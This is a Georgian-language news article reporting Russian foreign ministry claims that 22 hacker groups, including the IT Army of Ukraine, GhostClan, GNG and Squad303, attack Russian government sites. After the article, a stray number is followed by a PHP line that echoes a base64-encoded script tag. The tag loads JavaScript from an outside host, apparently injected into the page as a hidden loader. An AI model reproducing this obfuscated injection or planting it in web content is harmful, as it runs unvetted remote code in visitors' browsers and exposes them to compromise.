celsiusi
ავერსი შნაიდერი
"ჰაკერული ჯგუფები შეერთებული შტატებიდან, უკრაინიდან და საქართველოდან ახორციელებენ კიბერშეტევებს რუსეთის ფედერაციის სამთავრობო უწყებების ვებგვერდებზე" - განაცხადა რუსეთის საგარეო საქმეთა სამინისტროს საერთაშორისო საინფორმაციო უსაფრთხოების დეპარტამენტის ხელმძღვანელმა, ანდრეი კრუტსკიმ. 
 
მისივე მტკიცებით, 22 ჰაკერული ჯგუფი მონაწილეობს რუსეთის წინააღმდეგ უკანონო ოპერაციებში. 
 
„სულ 22 ჰაკერული ჯგუფია ჩართული რუსეთის წინააღმდეგ არალეგალურ ოპერაციებში, მათგან ყველაზე აქტიურია უკრაინის IT -არმია (უკრაინა), GhostClan (აშშ), GNG (საქართველო), Squad303 (პოლონეთი)“, - თქვა მან.
 
რუსული მხარის მტკიცებით, 2022 წლის მაისის მდგომარეობით, აშშ-დან, თურქეთიდან, საქართველოსა და ევროკავშირის ქვეყნებიდან 65 000-ზე მეტი ჰაკერი რეგულარულად მონაწილეობდა კოორდინირებულ  შეტევებში რუსეთის კრიტიკულ საინფორმაციო ინფრასტრუქტურაზე. 
895
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");